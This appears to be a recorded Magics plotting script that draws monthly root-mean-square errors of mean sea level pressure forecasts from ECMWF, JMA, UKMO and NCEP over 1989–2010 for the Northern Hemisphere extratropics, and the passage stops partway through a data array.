mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Title text box placement and font for the plot header.
mpp.setr('text_box_x_length',20.879099999999998)
mpp.setr('text_box_x_position',2.0344500000000005)
mpp.setr('text_box_y_length',5.586)
mpp.setc('subpage_frame','off')
mpp.setr('text_box_y_position',15.056999999999999)
mpp.setc('text_mode','positional')
mpp.setr('text_font_size',0.6)
mpp.setc('text_justification','left')
mpp.set1c('text_lines',['<font size="0.72"><b> </b></font>', ' <font size="0.54">Mean sea level pressure</font>', ' <font size="0.54">Root mean square error</font>', ' <font size="0.54">NHem Extratropics <font size=\'0.36\'>(lat 20.0 to 90.0, lon -180.0 to 180.0)</font></font>', ' <font size="0.54"> </font>', ' <font size="0.36">wmo_an od 0001 | 00UTC,verifying</font>'])
mpp.seti('text_line_count',6)
mpp.setc('text_html','on')
mpp.setc('text_colour','black')
mpp.text()
mpp.reset('text_mode')
mpp.reset('text_font_size')
mpp.reset('text_justification')
mpp.reset('text_lines')
mpp.reset('text_line_count')
mpp.reset('text_html')
mpp.reset('text_colour')
mpp.reset('text_box_x_length')
mpp.reset('text_box_x_position')
mpp.reset('text_box_y_length')
mpp.reset('subpage_frame')
mpp.reset('text_box_y_position')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('legend_box_x_position',16.335)
mpp.setc('legend_box_blanking','off')
mpp.setc('legend_text_composition','user_text_only')
mpp.setr('legend_box_y_position',15.120000000000001)
mpp.setr('legend_box_x_length',11.88)
mpp.setr('legend_box_x_length',11.88)
mpp.setr('legend_entry_text_width', 80.)
mpp.set1c('legend_user_lines',['ECMWF 12utc T+72', 'ECMWF 12utc T+120', 'JMA 12utc T+72', 'JMA 12utc T+120', 'UKMO 12utc T+72', 'UKMO 12utc T+120', 'NCEP 00utc T+72', 'NCEP 00utc T+120'])
mpp.seti('legend_column_count',2)
mpp.setr('legend_text_font_size',0.4)
mpp.setc('legend_box_mode','positional')
mpp.setc('legend_text_colour','black')
mpp.setr('legend_box_y_length',3.2)
mpp.setc('legend','on')
mpp.setc('legend_entry_plot_direction','column')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_x_length',25.541999999999998)
mpp.setr('subpage_x_position',2.97)
mpp.setc('layout','positional')
mpp.setr('subpage_y_position',2.3100000000000005)
mpp.setr('subpage_y_length',12.6)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_horizontal_axis_height',1.5)
mpp.setr('axis_tick_interval',1.0)
mpp.setc('axis_months_label','off')
mpp.setc('axis_date_min_value','1989-01-01')
mpp.setc('axis_type','date')
mpp.setc('axis_tick_label_position','inter_tick')
mpp.setc('axis_years_label','on')
mpp.setc('axis_title','off')
mpp.setc('axis_grid','on')
mpp.setr('axis_days_label_height',0.4)
mpp.setr('axis_months_label_height',0.4)
mpp.setc('axis_date_max_value','2010-12-01')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_date_type','years')
mpp.setr('axis_years_label_height',0.4)
mpp.setc('axis_minor_tick','off')
mpp.setc('axis_grid_colour','black')
mpp.setc('axis_days_label','off')
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_tick_interval')
mpp.reset('axis_months_label')
mpp.reset('axis_date_min_value')
mpp.reset('axis_type')
mpp.reset('axis_tick_label_position')
mpp.reset('axis_years_label')
mpp.reset('axis_title')
mpp.reset('axis_grid')
mpp.reset('axis_days_label_height')
mpp.reset('axis_months_label_height')
mpp.reset('axis_date_max_value')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_date_type')
mpp.reset('axis_years_label_height')
mpp.reset('axis_minor_tick')
mpp.reset('axis_grid_colour')
mpp.reset('axis_days_label')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setr('subpage_vertical_axis_width',1.5)
mpp.setc('axis_title_text','hPa')
mpp.setr('axis_tick_label_height',0.4)
mpp.setc('axis_orientation','vertical')
mpp.setr('axis_tick_size',0.175)
mpp.setr('axis_tick_interval',1.0)
mpp.setr('axis_title_height',0.4)
mpp.setr('axis_max_value',10.0)
mpp.setc('axis_grid','on')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_grid_colour','black')
mpp.setr('axis_min_value',1.0)
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_title_text')
mpp.reset('axis_tick_label_height')
mpp.reset('axis_orientation')
mpp.reset('axis_tick_size')
mpp.reset('axis_tick_interval')
mpp.reset('axis_title_height')
mpp.reset('axis_max_value')
mpp.reset('axis_grid')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_grid_colour')
mpp.reset('axis_min_value')
mpp.setr('graph_y_missing_value', 1.70000000e+38)
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 4.9 , 4.9 , 4.2 , 4.3 , 3.5 , 3.4 , 3.2 , 3.3 , 3.6 ,
3.8 , 4.4 , 4.6 , 4.7 , 4.4 , 4.8 , 4.2 , 3.7 , 3.2 ,
2.9 , 3.2 , 3.6 , 3.9 , 4.2 , 4.6 , 4.4 , 4.6 , 4.2 ,
4.1 , 3.5 , 3.2 , 2.9 , 3. , 3.6 , 4.1 , 4. , 4.6 ,
4.1 , 4.2 , 4. , 3.9 , 3.6 , 3.3 , 3. , 3. , 3.5 ,
3.5 , 4.1 , 4.2 , 4.3 , 4.1 , 4.2 , 3.6 , 3.4 , 3. ,
2.9 , 2.9 , 3.3 , 3.7 , 4. , 4.1 , 4.1 , 4.1 , 4.1 ,
3.7 , 3.3 , 3. , 2.7 , 2.7 , 3.2 , 3.5 , 4.2 , 4.1 ,
4.3 , 4.3 , 4.2 , 3.7 , 3.1 , 3. , 2.5 , 2.7 , 3.1 ,
3.6 , 4.1 , 3.9 , 4.3 , 4.2 , 4.1 , 3.5 , 3.5 , 2.7 ,
2.7 , 2.7 , 3.4 , 3.8 , 3.9 , 4.2 , 4.4 , 4.1 , 3.7 ,
3.6 , 3.2 , 3. , 2.5 , 2.8 , 3.2 , 3.5 , 3.8 , 3.9 ,
3.8 , 3.9 , 3.8 , 3.3 , 3. , 2.8 , 2.5 , 2.6 , 2.9 ,
3.3 , 3.5 , 3.9 , 3.9 , 3.8 , 3.6 , 3.3 , 3.1 , 2.9 ,
2.6 , 2.6 , 2.9 , 3.2 , 3.4 , 3.5 , 3.8 , 3.5 , 3.3 ,
3. , 2.8 , 2.7 , 2.4 , 2.4 , 2.8 , 2.9 , 3.2 , 3.3 ,
3.3 , 3.2 , 2.9 , 2.8 , 2.6 , 2.4 , 2.3 , 2.2 , 2.7 ,
2.6 , 3.1 , 3.1 , 3.2 , 3. , 3.1 , 2.8 , 2.4 , 2.3 ,
2.3 , 2.2 , 2.5 , 2.7 , 2.9 , 3.1 , 2.9 , 2.8 , 2.8 ,
2.5 , 2.4 , 2. , 2. , 2.1 , 2.4 , 2.7 , 2.7 , 2.9 ,
2.8 , 2.8 , 2.8 , 2.4 , 2.2 , 2. , 1.8 , 2. , 2.2 ,
2.5 , 2.6 , 2.9 , 2.8 , 2.8 , 2.6 , 2.4 , 2.1 , 2. ,
1.9 , 2. , 2.3 , 2.5 , 2.6 , 2.7 , 2.9 , 2.9 , 2.5 ,
2.3 , 2.1 , 2. , 2. , 1.8 , 2.2 , 2.4 , 2.5 , 2.8 ,
2.6 , 2.6 , 2.4 , 2.3 , 2. , 1.8 , 1.7 , 1.8 , 2. ,
2.1 , 2.4 , 2.5 , 2.5 , 2.4 , 2.2 , 2.1 , 1.9 , 1.8 ,
1.6 , 1.6 , 1.8 , 2.2 , 2.2 , 2.5 , 2.4 , 2.4 , 2.4 ,
2. , 1.9 , 1.7 , 1.6 , 1.7 , 1.8 , 2.1 , 2.3 , 2.6 ,
2.4 , 2.2 , 2.3 , 2. , 1.8 , 1.7 , 1.6 , 1.6 , 1.79,
1.94, 2.14, 2.37])) #264
mpp.setc('graph_missing_data_colour','red')
mpp.seti('graph_symbol_marker_index',15)
mpp.setc('graph_symbol_colour','red')
mpp.setc('graph_missing_data_style','dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
# Curve: red solid line with symbol markers (marker index 1).
# The matching 264 monthly x-dates were loaded just above via
# 'graph_curve_date_x_values'.
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
# 264 monthly y-values (one per date point).
mpp.set1r('graph_curve_y_values', array([
    7.4, 7.7, 7.1, 6.6, 5.7, 5.1, 4.8, 5.1, 5.8, 6.5, 7.3, 7.6,
    7.2, 6.8, 7.8, 6.8, 5.7, 5.1, 4.3, 4.7, 5.7, 6.5, 7.2, 7.5,
    7.0, 7.4, 6.9, 6.6, 5.4, 4.8, 4.3, 4.6, 5.7, 6.8, 6.9, 7.8,
    7.0, 7.1, 6.6, 6.6, 5.8, 5.3, 4.6, 4.7, 5.9, 6.0, 7.0, 7.2,
    7.2, 6.8, 6.9, 6.0, 5.6, 4.9, 4.5, 4.2, 5.2, 6.3, 6.8, 6.8,
    6.8, 7.5, 6.6, 6.3, 5.3, 4.8, 4.3, 4.1, 5.1, 6.0, 6.8, 7.1,
    6.8, 7.1, 6.6, 6.1, 5.0, 4.7, 3.9, 4.2, 5.0, 6.0, 7.0, 6.2,
    6.9, 7.0, 6.5, 5.6, 5.6, 4.2, 4.2, 4.3, 5.3, 6.3, 7.1, 6.9,
    7.2, 6.7, 6.4, 5.9, 5.2, 4.8, 4.0, 4.5, 5.1, 6.0, 6.5, 6.6,
    6.4, 6.4, 6.3, 5.7, 5.1, 4.5, 3.8, 4.2, 5.2, 6.0, 6.2, 6.4,
    6.4, 6.5, 6.0, 5.7, 5.5, 4.5, 4.2, 4.3, 5.1, 5.5, 5.9, 5.8,
    6.5, 5.9, 5.8, 5.4, 4.9, 4.5, 3.9, 3.9, 4.7, 5.1, 5.4, 5.6,
    5.7, 5.9, 5.2, 5.0, 4.6, 4.1, 4.0, 4.0, 4.7, 5.0, 5.5, 5.6,
    5.5, 5.6, 5.6, 4.9, 4.3, 3.9, 3.9, 3.8, 4.6, 4.6, 5.3, 5.6,
    5.3, 5.1, 5.3, 4.4, 4.3, 3.7, 3.4, 3.7, 4.5, 5.0, 4.9, 5.1,
    5.3, 4.8, 4.9, 4.4, 4.1, 3.8, 3.0, 3.6, 4.3, 4.9, 4.9, 5.3,
    5.0, 5.0, 4.9, 4.3, 3.9, 3.7, 3.3, 3.4, 4.3, 4.9, 5.0, 5.0,
    5.1, 5.3, 4.8, 4.2, 3.8, 3.4, 3.5, 3.1, 4.2, 4.6, 4.9, 5.1,
    4.8, 4.8, 4.5, 4.2, 3.8, 3.3, 3.0, 3.4, 3.9, 4.2, 4.6, 4.7,
    4.7, 4.9, 4.3, 4.2, 3.6, 3.3, 3.0, 3.0, 3.6, 4.4, 4.2, 5.0,
    4.4, 4.7, 4.9, 3.8, 3.8, 3.2, 2.9, 3.0, 3.6, 4.2, 4.5, 5.1,
    4.5, 4.3, 4.4, 4.1, 3.3, 3.1, 3.0, 3.1, 3.5, 3.76, 4.23, 4.62]))
# Styling for this curve: red markers, solid line, thickness 7.
mpp.setc('graph_missing_data_colour', 'red')
mpp.seti('graph_symbol_marker_index', 1)
mpp.setc('graph_symbol_colour', 'red')
mpp.setc('graph_missing_data_style', 'solid')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'solid')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
# Render the curve with the parameters set above.
mpp.graph()
# Restore every graph parameter touched for the previous curve
# back to its default before the next one is configured.
for _param in ('graph_line_colour',
               'graph_curve_date_x_values',
               'graph_missing_data_mode',
               'graph_symbol',
               'graph_missing_data_thickness',
               'graph_curve_y_values',
               'graph_missing_data_colour',
               'graph_symbol_marker_index',
               'graph_symbol_colour',
               'graph_missing_data_style',
               'graph_symbol_height',
               'graph_type',
               'graph_line_style',
               'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, as the original recording did.
# Recorded values: position 0.0/0.0, size 29.7 x 21.0 (presumably
# A4 landscape in centimetres — per the values noted in the trace).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
# Curve: 'brick' dotted line with symbol markers (marker index 18).
mpp.setc('graph_line_colour', 'brick')
# X axis: first of every month from 1989-01-01 to 2010-12-01
# (22 years x 12 months = 264 points).
mpp.set1c('graph_curve_date_x_values',
          ['%d-%02d-01' % (year, month)
           for year in range(1989, 2011)
           for month in range(1, 13)])
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
# 264 monthly y-values; 1.7e+38 appears to be the missing-value
# sentinel handled by the graph_missing_data_* settings.
mpp.set1r('graph_curve_y_values', array([
    5.7, 5.9, 5.4, 5.0, 4.3, 3.9, 3.5, 3.7, 4.3, 4.6, 5.0, 5.1,
    5.2, 5.0, 4.9, 4.3, 4.0, 3.5, 3.3, 3.4, 3.9, 4.3, 4.8, 5.1,
    5.1, 5.1, 4.8, 4.5, 4.1, 3.7, 3.3, 3.5, 3.9, 4.4, 4.4, 5.2,
    5.0, 5.1, 4.7, 4.3, 4.0, 3.8, 3.5, 3.5, 3.8, 4.2, 4.7, 5.1,
    5.6, 5.2, 5.1, 4.2, 3.8, 3.6, 3.3, 3.4, 3.9, 4.3, 4.9, 4.7,
    4.8, 5.1, 4.8, 4.2, 3.7, 3.6, 3.4, 3.4, 3.9, 4.0, 4.7, 5.1,
    5.1, 4.9, 4.9, 4.2, 3.8, 3.7, 3.3, 3.3, 3.9, 4.1, 5.0, 4.5,
    5.1, 5.0, 4.6, 3.9, 3.7, 3.2, 3.2, 3.1, 3.5, 4.0, 4.3, 4.7,
    4.7, 4.5, 4.2, 3.8, 3.5, 3.4, 2.8, 3.2, 3.7, 3.9, 4.5, 5.0,
    4.8, 4.8, 4.3, 3.8, 3.6, 3.1, 2.8, 2.9, 3.6, 4.2, 4.2, 5.0,
    4.9, 4.9, 4.3, 4.2, 3.5, 3.2, 3.0, 3.0, 3.6, 4.3, 4.9, 4.5,
    4.5, 4.2, 4.0, 3.5, 3.2, 3.1, 2.8, 2.8, 1.7e+38, 3.7, 3.7, 4.2,
    4.1, 4.3, 3.8, 3.7, 3.3, 3.2, 2.9, 2.9, 3.3, 3.6, 3.7, 4.1,
    4.24, 4.24, 4.0, 3.54, 3.25, 2.99, 2.86, 2.89, 3.1, 3.26, 3.55, 4.04,
    3.9, 3.68, 1.7e+38, 3.47, 3.32, 2.75, 2.94, 2.75, 3.14, 3.6, 3.41, 3.82,
    3.79, 3.69, 3.4, 3.25, 2.77, 2.62, 2.44, 2.6, 2.89, 3.25, 3.32, 3.75,
    3.49, 3.37, 3.18, 2.95, 2.7, 2.39, 2.35, 2.31, 2.77, 2.86, 3.19, 3.38,
    3.5, 3.46, 3.05, 2.74, 2.51, 2.34, 2.45, 2.2, 2.7, 2.89, 3.3, 3.41,
    3.49, 3.26, 3.06, 2.76, 2.55, 2.3, 2.2, 2.24, 1.7e+38, 2.79, 3.3, 2.96,
    3.08, 3.11, 2.61, 2.54, 2.36, 2.29, 2.14, 2.09, 2.24, 2.62, 2.59, 3.02,
    2.87, 2.74, 2.79, 2.36, 2.23, 2.06, 2.02, 2.05, 2.28, 2.59, 2.66, 2.88,
    2.89, 2.78, 2.72, 2.38, 2.22, 2.0, 2.06, 2.05, 2.26, 2.42, 2.7, 2.88]))
# Styling: brick markers, dotted line and dotted missing-data bridge.
mpp.setc('graph_missing_data_colour', 'brick')
mpp.seti('graph_symbol_marker_index', 18)
mpp.setc('graph_symbol_colour', 'brick')
mpp.setc('graph_missing_data_style', 'dot')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'dot')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
# Render the curve with the parameters set above.
mpp.graph()
# Restore every graph parameter touched for the previous curve
# back to its default before the next one is configured.
for _param in ('graph_line_colour',
               'graph_curve_date_x_values',
               'graph_missing_data_mode',
               'graph_symbol',
               'graph_missing_data_thickness',
               'graph_curve_y_values',
               'graph_missing_data_colour',
               'graph_symbol_marker_index',
               'graph_symbol_colour',
               'graph_missing_data_style',
               'graph_symbol_height',
               'graph_type',
               'graph_line_style',
               'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, as the original recording did.
# Recorded values: position 0.0/0.0, size 29.7 x 21.0 (presumably
# A4 landscape in centimetres — per the values noted in the trace).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
# Curve: 'brick' chain-dash line with symbol markers (marker index 2).
mpp.setc('graph_line_colour', 'brick')
# X axis: first of every month from 1989-01-01 to 2010-12-01
# (22 years x 12 months = 264 points).
mpp.set1c('graph_curve_date_x_values',
          ['%d-%02d-01' % (year, month)
           for year in range(1989, 2011)
           for month in range(1, 13)])
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
# 264 monthly y-values; 1.7e+38 appears to be the missing-value
# sentinel handled by the graph_missing_data_* settings.
mpp.set1r('graph_curve_y_values', array([
    8.4, 8.4, 7.7, 7.5, 6.1, 5.4, 4.8, 5.1, 6.2, 7.2, 7.7, 8.1,
    7.5, 7.5, 7.8, 6.9, 5.9, 5.2, 4.8, 4.8, 6.1, 6.9, 7.7, 7.9,
    7.7, 7.7, 7.4, 6.9, 5.9, 5.1, 4.8, 5.2, 5.5, 7.0, 6.9, 8.0,
    7.6, 7.4, 7.2, 6.6, 6.0, 5.6, 5.0, 5.0, 5.9, 6.3, 7.5, 8.0,
    8.9, 7.9, 7.9, 6.7, 5.9, 5.1, 4.7, 5.1, 5.8, 6.9, 7.7, 7.4,
    7.5, 8.3, 7.6, 6.7, 5.5, 5.5, 4.9, 4.9, 5.8, 6.1, 7.5, 7.6,
